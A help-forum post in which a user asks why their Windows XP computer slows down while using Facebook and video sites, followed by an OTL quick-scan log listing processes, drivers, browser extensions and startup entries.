Extensive use of Facebook and viewing other sites slows computer to st



#1
goodseed

While I am in Facebook, I view videos on other sites. My computer becomes so slow that I have to shut all sites down and run CCleaner and a registry cleaner before I can use Facebook and view other sites simultaneously. I have run Avast, Spybot, and SuperAntiSpyware but have only found low issues. Do I have something going on?

I first ran an OTL full scan, but the following is a quick scan:
OTL logfile created on: 1/17/2013 4:05:42 PM - Run 2
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Documents and Settings\Owner\My Documents\Downloads
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.6001.18702)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

503.29 Mb Total Physical Memory | 318.13 Mb Available Physical Memory | 63.21% Memory free
1.20 Gb Paging File | 0.45 Gb Available in Paging File | 37.32% Paging File free
Paging file location(s): C:\pagefile.sys 756 1512 [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 144.18 Gb Total Space | 74.90 Gb Free Space | 51.95% Space Free | Partition Type: NTFS
Drive D: | 4.85 Gb Total Space | 0.83 Gb Free Space | 17.18% Space Free | Partition Type: FAT32

Computer Name: YOUR-46E94OWX6A | User Name: Owner | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days

========== Processes (SafeList) ==========

PRC - [2013/01/17 15:45:50 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\Owner\My Documents\Downloads\OTL.exe
PRC - [2013/01/10 21:17:01 | 000,917,552 | ---- | M] (Mozilla Corporation) -- C:\Program Files\Mozilla Firefox\firefox.exe
PRC - [2012/11/01 13:45:21 | 004,763,008 | ---- | M] (SUPERAntiSpyware.com) -- C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
PRC - [2012/10/30 17:50:59 | 004,297,136 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe
PRC - [2012/10/30 17:50:59 | 000,044,808 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe
PRC - [2011/07/28 17:08:12 | 001,259,376 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
PRC - [2010/04/30 18:36:16 | 001,742,336 | ---- | M] (Alcatel-Lucent) -- C:\Program Files\Windstream_BCUC\McciTrayApp.exe
PRC - [2009/03/05 15:07:20 | 002,260,480 | ---- | M] (Safer-Networking Ltd.) -- C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
PRC - [2008/04/13 18:12:19 | 001,033,728 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\explorer.exe
PRC - [2006/11/03 19:20:12 | 000,866,584 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MSASCui.exe
PRC - [2006/11/03 19:19:58 | 000,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
PRC - [2003/11/07 03:50:00 | 000,019,968 | ---- | M] (Logitech Inc.) -- C:\WINDOWS\LOGI_MWX.EXE


========== Modules (No Company Name) ==========

MOD - [2013/01/10 21:16:48 | 003,021,872 | ---- | M] () -- C:\Program Files\Mozilla Firefox\mozjs.dll
MOD - [2012/12/17 01:22:00 | 002,040,320 | ---- | M] () -- C:\Program Files\AVAST Software\Avast\defs\12121700\algo.dll
MOD - [2012/01/03 12:33:35 | 008,527,008 | ---- | M] () -- C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
MOD - [2011/07/28 17:09:42 | 000,096,112 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdateCheck.dll
MOD - [2011/07/28 17:08:12 | 001,259,376 | ---- | M] () -- C:\Program Files\DivX\DivX Update\DivXUpdate.exe
MOD - [2009/12/20 19:42:16 | 000,176,235 | ---- | M] () -- C:\WINDOWS\system32\Primomonnt.dll
MOD - [2008/04/13 18:11:59 | 000,014,336 | ---- | M] () -- C:\WINDOWS\system32\msdmo.dll


========== Services (SafeList) ==========

SRV - File not found [Disabled | Stopped] -- %SystemRoot%\System32\hidserv.dll -- (HidServ)
SRV - File not found [Auto | Stopped] -- -- (avg9wd)
SRV - File not found [Auto | Stopped] -- -- (avg9emc)
SRV - File not found [On_Demand | Stopped] -- %SystemRoot%\System32\appmgmts.dll -- (AppMgmt)
SRV - File not found [Auto | Stopped] -- -- (!SASCORE)
SRV - [2013/01/10 21:16:50 | 000,115,760 | ---- | M] (Mozilla Foundation) [Disabled | Stopped] -- C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe -- (MozillaMaintenance)
SRV - [2012/10/30 17:50:59 | 000,044,808 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus)
SRV - [2006/11/03 19:19:58 | 000,013,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)


========== Driver Services (SafeList) ==========

DRV - File not found [Kernel | On_Demand | Stopped] -- -- (WDICA)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDRELI)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDFRAME)
DRV - File not found [Kernel | On_Demand | Stopped] -- -- (PDCOMP)
DRV - File not found [Kernel | System | Stopped] -- -- (PCIDump)
DRV - File not found [Kernel | Auto | Stopped] -- -- (mrtRate)
DRV - File not found [Kernel | System | Stopped] -- C:\WINDOWS\system32\MpEngineStore\MpKsl08115bda.sys -- (MpKsl08115bda)
DRV - File not found [Kernel | System | Stopped] -- -- (lbrtfdc)
DRV - File not found [Kernel | System | Stopped] -- -- (i2omgmt)
DRV - File not found [Kernel | System | Stopped] -- -- (Changer)
DRV - [2012/10/30 17:51:58 | 000,738,504 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\WINDOWS\System32\drivers\aswSnx.sys -- (aswSnx)
DRV - [2012/10/30 17:51:58 | 000,361,032 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswSP.sys -- (aswSP)
DRV - [2012/10/30 17:51:58 | 000,054,232 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswTdi.sys -- (aswTdi)
DRV - [2012/10/30 17:51:58 | 000,035,928 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aswRdr.sys -- (AswRdr)
DRV - [2012/10/30 17:51:57 | 000,097,608 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswmon2.sys -- (aswMon2)
DRV - [2012/10/30 17:51:56 | 000,025,256 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\aavmker4.sys -- (Aavmker4)
DRV - [2012/10/30 17:51:56 | 000,021,256 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\WINDOWS\System32\drivers\aswFsBlk.sys -- (aswFsBlk)
DRV - [2011/07/22 10:27:02 | 000,012,880 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\sasdifsv.sys -- (SASDIFSV)
DRV - [2011/07/12 15:55:22 | 000,067,664 | ---- | M] (SUPERAdBlocker.com and SUPERAntiSpyware.com) [Kernel | System | Running] -- C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS -- (SASKUTIL)
DRV - [2010/06/30 02:27:08 | 000,049,904 | R--- | M] (Avanquest Software) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\BVRPMPR5.SYS -- (BVRPMPR5)
DRV - [2010/04/30 18:32:06 | 000,020,096 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MRESP50.sys -- (MRESP50)
DRV - [2010/04/30 18:30:56 | 000,021,248 | ---- | M] (Printing Communications Assoc., Inc. (PCAUSA)) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MREMP50.sys -- (MREMP50)
DRV - [2009/05/14 14:20:02 | 000,030,656 | ---- | M] (Eutron) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\eusk2par.sys -- (eusk2par)
DRV - [2005/12/12 17:27:00 | 000,019,072 | ---- | M] (Hewlett-Packard Company) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\PS2.sys -- (Ps2)
DRV - [2004/11/22 17:36:40 | 000,018,003 | ---- | M] (Motive, Inc.) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MRENDIS5.sys -- (MRENDIS5)
DRV - [2004/11/22 17:36:34 | 000,019,345 | ---- | M] (Motive, Inc.) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Motive\MREMPR5.sys -- (MREMPR5)
DRV - [2004/06/29 09:07:18 | 001,268,204 | ---- | M] (Agere Systems) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\AGRSM.sys -- (AgereSoftModem)
DRV - [2004/05/12 03:36:50 | 000,043,672 | ---- | M] (Oak Technology Inc.) [Kernel | System | Running] -- C:\WINDOWS\System32\drivers\AFS2K.SYS -- (AFS2K)
DRV - [2004/05/05 07:02:12 | 002,155,200 | ---- | M] (Realtek Semiconductor Corp.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\RtkHDAud.sys -- (IntcAzAudAddService)
DRV - [2004/01/02 21:05:48 | 000,011,520 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | System | Running] -- C:\WINDOWS\system32\drivers\srvkp.sys -- (SiSkp)
DRV - [2004/01/02 20:20:40 | 000,432,000 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\sisgrp.sys -- (SiS315)
DRV - [2003/12/02 19:23:20 | 000,142,336 | ---- | M] (Promise Technology, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\Fasttx2k.sys -- (fasttx2k)
DRV - [2003/11/07 03:50:00 | 000,070,798 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\LMouFlt2.Sys -- (LMouFlt2)
DRV - [2003/11/07 03:50:00 | 000,051,486 | ---- | M] (Logitech, Inc.) [Kernel | On_Demand | Stopped] -- C:\WINDOWS\system32\drivers\L8042pr2.Sys -- (L8042pr2)
DRV - [2003/09/19 00:47:00 | 000,010,368 | ---- | M] (Padus, Inc.) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\pfc.sys -- (Pfc)
DRV - [2003/07/18 17:58:20 | 000,036,992 | ---- | M] (Silicon Integrated Systems Corporation) [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\SISAGPX.SYS -- (SISAGP)
DRV - [2003/07/02 12:42:00 | 000,027,904 | ---- | M] (VIA Technologies, Inc.) [Kernel | Boot | Running] -- C:\WINDOWS\system32\drivers\VIAAGP1.SYS -- (viaagp1)
DRV - [2002/10/04 18:04:10 | 000,046,976 | ---- | M] (Realtek Semiconductor Corporation ) [Kernel | On_Demand | Running] -- C:\WINDOWS\system32\drivers\R8139n51.sys -- (rtl8139)


========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKLM\..\SearchScopes,DefaultScope = {6A1806CD-94D4-4689-BA73-E35EA1EA9990}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...ferrer:source?}
IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...g}&sourceid=ie7
IE - HKLM\..\SearchScopes\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}: "URL" = http://us.yhs.search...p={searchTerms}

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKCU\..\SearchScopes,DefaultScope = {039200FA-A7A5-4085-A14A-AAC65209AC5E}
IE - HKCU\..\SearchScopes\{039200FA-A7A5-4085-A14A-AAC65209AC5E}: "URL" = http://www.bing.com/...rc=IE-SearchBox
IE - HKCU\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://search.live.c...Box&Form=IE8SRC
IE - HKCU\..\SearchScopes\{442DC793-0C09-4FE7-B9D9-BE3B9888E05E}: "URL" = http://search.mywebs...s={searchTerms}
IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.co...&rlz=1I7SUNA_en
IE - HKCU\..\SearchScopes\{CCC7A320-B3CA-4199-B1A6-9F516DD69829}: "URL" = http://search.avg.co...e}&iy=&ychte=us
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>

========== FireFox ==========

FF - prefs.js..browser.search.order.1: "Search"
FF - prefs.js..browser.search.selectedEngine: "Search"
FF - prefs.js..browser.startup.homepage: "www.startpage.com"
FF - prefs.js..extensions.enabledAddons: %7B23fcfd51-4958-4f00-80a3-ae97e717ed8b%7D:2.1.2.145
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:18.0
FF - prefs.js..extensions.enabledItems: [email protected]:1.0
FF - prefs.js..extensions.enabledItems: {ABDE892B-13A8-4d1b-88E6-365A6E755758}:1.0
FF - prefs.js..extensions.enabledItems: {3f963a5b-e555-4543-90e2-c3908898db71}:10.0.0.1167
FF - prefs.js..keyword.URL: "http://search.mywebs...10101070100&s="

FF - user.js..browser.search.selectedEngine: "Search"
FF - user.js..browser.search.order.1: "Search"
FF - user.js..keyword.URL: "http://search.mywebs...10101070100&s="

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=: File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@bittorrent.com/BitTorrentDNA: C:\Program Files\DNA\plugins\npbtdna.dll (BitTorrent, Inc.)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Browser Plugin,version=1.0.0: C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Content Upload Plugin,version=1.0.0: File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX Player Plugin,version=1.0.0: File not found
FF - HKLM\Software\MozillaPlugins\@divx.com/DivX VOD Helper,version=1.0.0: C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@Motive.com/NpMotive,version=1.0: C:\Program Files\Common Files\Motive\npMotive.dll (Alcatel-Lucent)
FF - HKLM\Software\MozillaPlugins\@real.com/RhapsodyPlayerEngine,version=1.1: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=8: File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll (Google Inc.)
FF - HKCU\Software\MozillaPlugins\@adobe.com/FlashPlayer: File not found

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\{23fcfd51-4958-4f00-80a3-ae97e717ed8b}: C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2011/12/20 09:19:45 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Program Files\AVAST Software\Avast\WebRep\FF [2013/01/14 19:24:00 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/01/10 21:17:06 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 18.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2008/08/27 05:09:54 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Extensions
[2013/01/11 09:03:21 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions
[2013/01/11 09:03:21 | 000,000,000 | ---D | M] ("Codec-V") -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]
[2013/01/11 09:03:20 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\[email protected]\chrome\content\extensionCode
[2012/02/12 09:30:04 | 000,020,591 | ---- | M] () (No name found) -- C:\Documents and Settings\Owner\Application Data\Mozilla\Firefox\Profiles\5qu4u2c8.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi
[2013/01/10 21:14:59 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2011/12/20 09:19:45 | 000,000,000 | ---D | M] (DivX Plus Web Player HTML5 <video>) -- C:\PROGRAM FILES\DIVX\DIVX PLUS WEB PLAYER\FIREFOX\DIVXHTML5
[2013/01/10 21:17:04 | 000,262,704 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll
[2012/10/12 21:17:06 | 000,002,465 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\bing.xml
[2012/10/12 21:17:06 | 000,002,058 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

========== Chrome ==========

CHR - homepage: http://www.google.com
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:acceptedSuggestion}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}sourceid=chrome&ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&hl={language}&q={searchTerms}&sugkey={google:suggestAPIKeyParameter}
CHR - homepage: http://www.google.com
CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\PepperFlash\pepflashplayer.dll
CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer
CHR - plugin: Native Client (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\ppGoogleNaClPluginChrome.dll
CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files\Google\Chrome\Application\24.0.1312.52\pdf.dll
CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin2.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin3.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin4.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin5.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin6.dll
CHR - plugin: QuickTime Plug-in 7.5.5 (Enabled) = C:\Program Files\QuickTime\plugins\npqtplugin7.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npdrmv2.dll
CHR - plugin: Windows Media Player Plug-in Dynamic Link Library (Enabled) = C:\Program Files\Windows Media Player\npdsplay.dll
CHR - plugin: Microsoft\u00AE DRM (Enabled) = C:\Program Files\Windows Media Player\npwmsdrm.dll
CHR - plugin: Motive Plugin (Enabled) = C:\Program Files\Common Files\Motive\npMotive.dll
CHR - plugin: DNA Plug-in (Enabled) = C:\Program Files\DNA\plugins\npbtdna.dll
CHR - plugin: DivX VOD Helper Plug-in (Enabled) = C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll
CHR - plugin: DivX Plus Web Player (Enabled) = C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll
CHR - plugin: Google Update (Enabled) = C:\Program Files\Google\Update\1.3.21.123\npGoogleUpdate3.dll
CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll
CHR - plugin: Shockwave Flash (Enabled) = C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll
CHR - plugin: Silverlight Plug-In (Enabled) = c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll
CHR - plugin: Windows Presentation Foundation (Enabled) = c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll
CHR - Extension: Google Docs = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\
CHR - Extension: Google Docs = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.4_0\
CHR - Extension: Google Drive = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\
CHR - Extension: Google Drive = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\
CHR - Extension: Google Search = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\
CHR - Extension: avast! WebRep = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\icmlaeflemplmjndnaapfdbbnpncnbda\7.0.1474_0\
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.14.36_0\
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.20.67_0\crossrider
CHR - Extension: Codec-V = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jpnbdefcbnoefmmcpelplabbkfmfhlho\1.20.67_0\
CHR - Extension: DivX Plus Web Player HTML5 \u003Cvideo\u003E = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nneajnkjbffgblleaoojgaacokifdkhm\2.1.2.145_0\
CHR - Extension: Gmail = C:\Documents and Settings\Owner\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\

O1 HOSTS File: ([2010/12/22 18:34:40 | 000,000,098 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\Hosts
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: (no name) - {02478D38-C3F9-4efb-9B51-7695ECA05670} - No CLSID value found.
O2 - BHO: (Adobe PDF Reader Link Helper) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
O2 - BHO: (DivX Plus Web Player HTML5 <video>) - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)
O2 - BHO: (Spybot-S&D IE Protection) - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (no name) - - No CLSID value found.
O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKLM\..\Toolbar: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O3 - HKLM\..\Toolbar: (no name) - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.
O3 - HKCU\..\Toolbar\ShellBrowser: (no name) - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - No CLSID value found.
O3 - HKCU\..\Toolbar\ShellBrowser: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O3 - HKCU\..\Toolbar\WebBrowser: (HP view) - {B2847E28-5D7D-4DEB-8B67-05D28BCF79F5} - c:\Program Files\HP\Digital Imaging\bin\hpdtlk02.dll (Hewlett-Packard Company)
O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software)
O4 - HKLM..\Run: [DivXUpdate] C:\Program Files\DivX\DivX Update\DivXUpdate.exe ()
O4 - HKLM..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe (HP)
O4 - HKLM..\Run: [Logitech Utility] C:\WINDOWS\LOGI_MWX.EXE (Logitech Inc.)
O4 - HKLM..\Run: [Windows Defender] C:\Program Files\Windows Defender\MSASCui.exe (Microsoft Corporation)
O4 - HKLM..\Run: [Windstream_BCUC_McciTrayApp] C:\Program Files\Windstream_BCUC\McciTrayApp.exe (Alcatel-Lucent)
O4 - HKCU..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (Safer-Networking Ltd.)
O4 - HKCU..\Run: [SUPERAntiSpyware] C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe (SUPERAntiSpyware.com)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 145
O9 - Extra 'Tools' menuitem : Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll (Safer Networking Limited)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000004 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://download.micr...heckControl.cab (Windows Genuine Advantage Validation Tool)
O16 - DPF: {5ED80217-570B-4DA9-BF44-BE107C0EC166} http://cdn.scan.onec...lscbase6770.cab (Windows Live Safety Center Base Module)
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} http://www.update.mi...b?1192293460281 (MUWebControl Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_11)
O16 - DPF: {8FFBE65D-2C9C-4669-84BD-5829DC0B603C} http://fpdownload.ma...t/ultrashim.cab (Reg Error: Key error.)
O16 - DPF: {CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_03)
